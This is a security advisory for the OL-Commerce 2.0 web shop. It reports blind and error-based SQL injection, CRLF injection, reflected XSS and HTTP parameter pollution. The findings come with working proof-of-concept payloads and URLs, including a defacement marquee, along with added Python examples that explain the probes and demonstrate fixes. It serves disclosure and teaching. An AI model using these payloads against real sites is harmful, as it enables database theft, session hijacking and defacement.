
OL-Commerce Version 2.0 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
===========================================
Vendor : http://www.ol-commerce.com
Dork   : Copyright (c) 2007 OL-Commerce
==================================================

Blind SQL Injection :

This vulnerability affects /olcommerce/affiliate_signup.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input a_country was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
The probe is MySQL-specific (sleep(), sysdate()) and is built to evaluate in three injection contexts at once: as a bare expression when a_country lands unquoted in the query, inside single quotes through the 'XOR(...)OR' part, and inside double quotes through the "XOR(...)OR" part; the /* ... */ comment hides the two quoted variants in the unquoted case. A response delayed by the requested number of seconds shows that the value reaches the database unescaped.

Tests performed (POST a_country value => response time):
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ => 19.937 s
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ => 7.113 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 13.291 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 1.217 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.905 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.983 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.796 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 13.119 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.765 s

Original value: 1
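The timings above are the whole evidence for this finding, so it is worth checking what they show: the response time grows by roughly twice the requested sleep on top of about 0.9 s of baseline (the injected value is evidently evaluated twice), which is exactly the linear relationship a real sleep() produces and network jitter does not. The following is an added example, not code from the advisory or from OL-Commerce: it rebuilds the three-context probe and fits a line through the (sleep, response time) samples reported above to decide whether the delay is real. The samples list is copied from the table above; the thresholds are assumptions.

```python
# Added example (not from the advisory): build the MySQL time-based probe used
# above and check whether (sleep, response time) samples show the linear growth
# that confirms a time-based blind SQL injection rather than network jitter.
from typing import Sequence, Tuple


def mysql_time_probe(seconds: int) -> str:
    """Return the three-context probe the scan sent in POST a_country.

    The bare expression works when the value lands unquoted, the 'XOR(...)OR'
    part when it lands inside single quotes and the "XOR(...)OR" part inside
    double quotes; the /* ... */ comment hides the quoted variants otherwise.
    """
    probe = f"if(now()=sysdate(),sleep({seconds}),0)"
    return f"{probe}/*'XOR({probe})OR'\"XOR({probe})OR\"*/"


def fit_delay(samples: Sequence[Tuple[float, float]]) -> Tuple[float, float]:
    """Least-squares line through (requested sleep, observed seconds).

    Returns (slope, intercept): slope is seconds of delay per second of
    sleep(), intercept is the baseline response time without any sleep.
    """
    n = len(samples)
    mean_x = sum(x for x, _ in samples) / n
    mean_y = sum(y for _, y in samples) / n
    sxx = sum((x - mean_x) ** 2 for x, _ in samples)
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in samples)
    slope = sxy / sxx
    return slope, mean_y - slope * mean_x


def is_time_based(samples, min_slope: float = 0.8, max_residual: float = 1.5) -> bool:
    """True when the delay grows at least min_slope seconds per requested
    second and every sample sits within max_residual seconds of the fitted
    line.  A real sleep() gives a slope of about 1 (a multiple of 1 if the
    value is evaluated in several queries); jitter gives a slope near zero or
    scattered residuals.  Both thresholds are assumed, tune them per target."""
    slope, intercept = fit_delay(samples)
    if slope < min_slope:
        return False
    return all(abs(y - (slope * x + intercept)) <= max_residual for x, y in samples)


# (sleep, seconds) pairs copied from the tests reported above
ADVISORY_SAMPLES = [
    (9, 19.937), (3, 7.113), (6, 13.291), (0, 1.217), (0, 0.905),
    (0, 0.983), (0, 0.796), (6, 13.119), (0, 0.765),
]

if __name__ == "__main__":
    print(mysql_time_probe(0))
    slope, base = fit_delay(ADVISORY_SAMPLES)
    print(f"delay = {slope:.2f} * sleep + {base:.2f} s, "
          f"confirmed: {is_time_based(ADVISORY_SAMPLES)}")
```

Always include several sleep(0) requests and at least two non-zero sleep values, as the scan did: a single slow response proves nothing, and the intercept tells you how much of the delay is the application itself.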

CRLF injection/HTTP response splitting :

HTTP headers have the structure "Key: Value", with each header line terminated by the CRLF sequence. If user input is placed in the value part without removing or encoding CR and LF characters, the attacker can terminate the header line and append headers, or an entire second response, of his own.
HTTP response splitting is an application-level attack technique that enables web cache poisoning, cross-user defacement, hijacking of pages that contain sensitive user data, and cross-site scripting (XSS). The attacker sends a single HTTP request that makes the web server emit an output stream which the recipient (browser or proxy) interprets as two HTTP responses instead of one.
Affected items
/olcommerce/advanced_search.php
/olcommerce/advanced_search_result.php
/olcommerce/affiliate_password_forgotten.php
/olcommerce/index.php
/olcommerce/shop_content.php
The impact of this vulnerability
A remote attacker can inject custom HTTP headers: for example a Set-Cookie header that fixes the victim's session (session fixation), or a second response body containing HTML and script that the browser renders (XSS).

How to fix this vulnerability
Remove or reject CR (0x0D) and LF (0x0A) in any user input that reaches a response header, or encode the value for that context, so that no additional header lines can be injected. Check the value after URL-decoding: in the request the characters arrive as %0d%0a.
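To make the fix concrete, here is an added example (my own code, not part of the advisory or of OL-Commerce) that assembles a redirect the way a PHP script would with header('Location: ' . $url), shows that a value carrying CR/LF turns the one response into two, and applies the check described above. The Location target and the injected second response are constructed for the demonstration.

```python
# Added example (not from the advisory): a header value carrying CR/LF ends
# the real response early and lets the attacker append a second, fully
# controlled response; is_safe_header_value() is the check the fix describes.
import re

CRLF_RE = re.compile(r"[\r\n]")


def is_safe_header_value(value: str) -> bool:
    """False if the value could break out of its header line.

    Browsers and proxies treat CR (0x0D) and LF (0x0A) as the end of a header
    line, so the only safe policy is to refuse them.  A lone CR or LF is
    rejected too, because some parsers accept either one as a line ending.
    """
    return CRLF_RE.search(value) is None


def safe_header_value(value: str) -> str:
    """Return the value unchanged or raise, never try to 'clean' it."""
    if not is_safe_header_value(value):
        raise ValueError("CR/LF not allowed in a header value")
    return value


def build_redirect(location: str, check=lambda v: v) -> bytes:
    """Assemble the redirect a script sends with header('Location: ' . $url);
    check() is applied to the value the way the fixed code would."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {check(location)}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode()


def count_responses(raw: bytes) -> int:
    """Count the HTTP responses a client would see in the byte stream: every
    status line at the start of a line begins a new response."""
    return len(re.findall(rb"(?m)^HTTP/1\.[01] \d{3} ", raw))


# Constructed attacker value: CRLF CRLF ends the 302 early, then a second
# response with an attacker-chosen body follows (sent as %0d%0a in the URL).
INJECTED_LOCATION = (
    "/olcommerce/index.php\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "<script>alert(1)</script>"
)

if __name__ == "__main__":
    print("responses seen:", count_responses(build_redirect(INJECTED_LOCATION)))  # 2
    try:
        build_redirect(INJECTED_LOCATION, check=safe_header_value)
    except ValueError as err:
        print("rejected:", err)
```

Rejecting is preferable to stripping the characters: a stripped value silently changes meaning, whereas a rejected one surfaces the attempt in the logs. Note that PHP's own header() function has refused values containing a newline since PHP 5.1.2, so on a current PHP the splitting itself fails; the scanner still flags the reflection, and the application-side check costs nothing.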

PoC URL (HTML injection through the keywords parameter):
http://127.0.0.1/olcommerce/advanced_search_result.php?keywords=%3Cmarquee%3E%3Cfont+color%3DBlue+size&x=14&y=13

Cross site scripting (verified) :

http://127.0.0.1/olcommerce/advanced_search_result.php?categories_id=1%22%20onmouseover%3dprompt%28923816%29%20bad%3d%22&inc_subcat=1&keywords=1&manufacturers_id=1&pfrom=1&pto=1&search_in_description=1
The categories_id value decodes to 1" onmouseover=prompt(923816) bad=" : the double quote closes the attribute the value is reflected into, onmouseover= adds an event handler to the same tag, and bad=" swallows the original closing quote.

Affected items
/olcommerce/advanced_search_result.php
/olcommerce/affiliate_signup.php
The impact of this vulnerability
Malicious users can inject JavaScript, HTML or other active content (VBScript, ActiveX, Flash) into the vulnerable page so that it runs in the victim's browser. An attacker can steal the session cookie and take over the account, impersonating the user, or modify the content of the page presented to the user.

How to fix this vulnerability
Encode every reflected value for the context it is written into; for these parameters, which end up inside HTML attributes, that means htmlspecialchars($value, ENT_QUOTES) (or equivalent) at output time. Stripping < and > is not enough: the verified payload above contains neither.
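The point about the filter is easy to demonstrate. The following is an added example, not code from the advisory or from OL-Commerce: it reflects the decoded categories_id payload into a double-quoted attribute, once through a filter that only strips angle brackets and once through attribute encoding, and then parses the result the way a browser would. The hidden-input template is an assumption, since the advisory does not show where the value is reflected.

```python
# Added example (not from the advisory): the verified categories_id payload
# has no angle brackets, so a "metacharacter filter" that strips < and > does
# not stop it; encoding the value for the attribute it is written into does.
import html
import re
from html.parser import HTMLParser

# Payload from the PoC URL above, URL-decoded
PAYLOAD = '1" onmouseover=prompt(923816) bad="'

# Assumed shape of the reflection: the value ends up inside a double-quoted
# attribute of a form field (the exact markup is not shown in the advisory)
TEMPLATE = '<input type="hidden" name="categories_id" value="{}">'


def strip_angle_brackets(value: str) -> str:
    """The naive filter: removes < and >, which the payload never uses."""
    return re.sub(r"[<>]", "", value)


def attr_encode(value: str) -> str:
    """Encode for an HTML attribute: & < > " ' become entity references,
    the same transformation as htmlspecialchars($v, ENT_QUOTES) in PHP."""
    return html.escape(value, quote=True)


def render(value: str, encoder) -> str:
    return TEMPLATE.format(encoder(value))


class _FirstTag(HTMLParser):
    """Collect the attributes of the first tag, as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = dict(attrs)


def tag_attributes(markup: str) -> dict:
    parser = _FirstTag()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


if __name__ == "__main__":
    for name, enc in (("strip <>", strip_angle_brackets), ("attr_encode", attr_encode)):
        attrs = tag_attributes(render(PAYLOAD, enc))
        print(f"{name:12s} onmouseover injected: {'onmouseover' in attrs}")
```

With the bracket filter the parser sees a separate onmouseover attribute; with attribute encoding the whole payload stays inside the value attribute and round-trips unchanged, which is what output encoding is supposed to achieve.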

HTTP parameter pollution :

HPP attacks consist of injecting query-string delimiters (& and =, possibly URL-encoded) into the value of an existing parameter. If the web application reuses such a value in a URL without encoding it, a malicious user can add or override parameters and change the logic of the application, on the client side or on the server side.
This vulnerability affects /olcommerce/advanced_search.php.
Discovered by: Scripting (HTTP_Parameter_Pollution.script).
Attack details
URL encoded POST input quickie was set to 1&n959801=v983563
Parameter precedence: first occurrence
Affected link: http://127.0.0.1/olcommerce/advanced_search_result.php?keywords=1&n959801=v983563&language=en
Affected parameter: keywords=1
The POST value is copied unencoded into the result link, so the &n959801=v983563 embedded in it arrives as a separate GET parameter.

The impact of this vulnerability
The impact depends on the affected web application. An attacker could

Override existing hardcoded HTTP parameters
Modify the application behaviour
Access and potentially exploit variables the application did not expect to be user-controlled
Bypass input validation checkpoints and WAF rules

How to fix this vulnerability
URL-encode every user-supplied value when building a query string (rawurlencode() per value, or http_build_query() for the whole parameter set) so that & and = inside a value cannot introduce or override parameters.
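The following added example (my own code, not from the advisory or from OL-Commerce) rebuilds the affected link both ways, by concatenation and with per-value encoding, and parses the result under the two duplicate-parameter policies that matter here: the first-occurrence precedence the scan reported for this application and the last-occurrence precedence of PHP's $_GET. The POST value is the one from the scan; the link builders are assumed reconstructions of what the application does.

```python
# Added example (not from the advisory): the quick-search value is copied raw
# into the result link, so "&name=value" inside it becomes a parameter of its
# own; encoding each value when the link is built is the fix described above.
from urllib.parse import parse_qsl, urlencode

BASE = "http://127.0.0.1/olcommerce/advanced_search_result.php"
# Constructed POST value, as in the scan above
QUICKIE = "1&n959801=v983563"


def build_link_vulnerable(keywords: str) -> str:
    """String concatenation, which is what the affected link above shows."""
    return f"{BASE}?keywords={keywords}&language=en"


def build_link_fixed(keywords: str) -> str:
    """urlencode() percent-encodes & and = inside each value (in PHP:
    http_build_query(), or rawurlencode() applied to every value)."""
    return BASE + "?" + urlencode({"keywords": keywords, "language": "en"})


def parse_params(url: str, precedence: str = "first") -> dict:
    """Parse the query string the way the receiving application would.

    Duplicate names are resolved by policy: the scan reported that this
    application honours the first occurrence; PHP's $_GET keeps the last.
    """
    pairs = parse_qsl(url.split("?", 1)[1], keep_blank_values=True)
    params = {}
    for name, value in pairs:
        if precedence == "last" or name not in params:
            params[name] = value
    return params


if __name__ == "__main__":
    print(parse_params(build_link_vulnerable(QUICKIE)))
    print(parse_params(build_link_fixed(QUICKIE)))
    # Whether a hard-coded parameter can be overridden depends on precedence
    print(parse_params(build_link_vulnerable("1&language=fr"), "first"))
    print(parse_params(build_link_vulnerable("1&language=fr"), "last"))
```

The precedence switch is the practical lesson: with first-occurrence precedence an injected &language=fr placed before the hard-coded &language=en wins, so the same unencoded concatenation lets the attacker override parameters the developer believed were fixed.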

PoC URL:
http://127.0.0.1/olcommerce/advanced_search_result.php?keywords=1&n959801=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E

SQL injection (verified) :

This vulnerability affects /olcommerce/affiliate_signup.php.
Discovered by: Scripting (Sql_Injection.script).
Attack details
URL encoded POST input a_country was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(66),CHAR(113),CHAR(65),CHAR(74),CHAR(73),CHAR(84),CHAR(109),CHAR(51)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
Injected pattern found:
4CuBqAJITm3
(the string spelled by the CHAR() calls in the payload; the payload is the classic MySQL error-based technique, which makes the server return it inside a duplicate-entry error message)

The impact of this vulnerability
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

How to fix this vulnerability
Pass user input to the database only through prepared statements with bound parameters (PDO or mysqli in PHP); do not rely on filtering metacharacters. The blind injection reported above uses the same a_country parameter of affiliate_signup.php and is fixed by the same change.
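The payload above looks opaque, so here is an added example (my own code, not from the advisory or from OL-Commerce) that shows why it works: MySQL's RAND(0) is a deterministic sequence, and a GROUP BY over floor(rand(0)*2) evaluates the key once when looking the group up and again when inserting a new group, so on the third source row it inserts a key that already exists and the statement fails with a duplicate-entry error that carries the concat()ed marker. The generator follows MySQL's implementation of RAND (my_rnd in the server source); the group-by model is a reconstruction of that documented behaviour, not MySQL code.

```python
# Added example (not from the advisory): why the payload above makes the
# database return the injected string.  mysql_rand() reproduces MySQL's
# RAND(seed) sequence; group_by_rand() models the GROUP BY double evaluation
# that causes the duplicate-key error (a model, not MySQL source).
import re

_MAX = 0x3FFFFFFF

# Payload sent in POST a_country, as reported above
PAYLOAD = (
    "'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),"
    "CHAR(117),CHAR(66),CHAR(113),CHAR(65),CHAR(74),CHAR(73),CHAR(84),CHAR(109),"
    "CHAR(51)) from information_schema.tables limit 0,1),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a)and'"
)


def mysql_rand(seed: int):
    """Yield the same sequence MySQL's RAND(seed) produces.

    Seeding and the linear congruential step are those of the server's
    Item_func_rand / my_rnd; RAND(0) therefore starts 0.1552, 0.6209, 0.6387,
    0.3311, 0.7392, 0.7028, ... on every MySQL server.
    """
    seed1 = (seed * 0x10001 + 55555555) % _MAX
    seed2 = (seed * 0x10000001) % _MAX
    while True:
        seed1 = (seed1 * 3 + seed2) % _MAX
        seed2 = (seed1 + seed2 + 33) % _MAX
        yield seed1 / _MAX


def decode_char_calls(sql: str) -> str:
    """Spell out the string built from the CHAR(n) calls in the payload."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", sql))


def group_by_rand(marker: str, rows: int) -> dict:
    """Model SELECT count(*),concat(marker,floor(rand(0)*2))x ... GROUP BY x
    over `rows` source rows.  Returns the groups, or raises the duplicate-key
    error that carries the marker back to the attacker."""
    rand = mysql_rand(0)
    key_of = lambda: marker + str(int(next(rand) * 2))   # floor(rand(0)*2)
    groups = {}
    for _ in range(rows):
        key = key_of()                  # evaluated to look the group up
        if key in groups:
            groups[key] += 1
            continue
        key = key_of()                  # evaluated again for the insert
        if key in groups:
            raise RuntimeError(f"Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups


if __name__ == "__main__":
    marker = decode_char_calls(PAYLOAD)
    print("marker:", marker)
    try:
        group_by_rand(marker, rows=3)
    except RuntimeError as err:
        print("ERROR 1062 (23000):", err)
```

The sequence 0, 1, 1 is what makes three rows enough: row 1 looks up key 0 and inserts key 1, row 2 finds key 1, row 3 looks up key 0 and tries to insert key 1 again. information_schema.tables always has more than three rows, which is why the payload uses it as the row source; the marker can be any subquery, and the scanner's CHAR() string is simply a value it can recognise in the error text.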








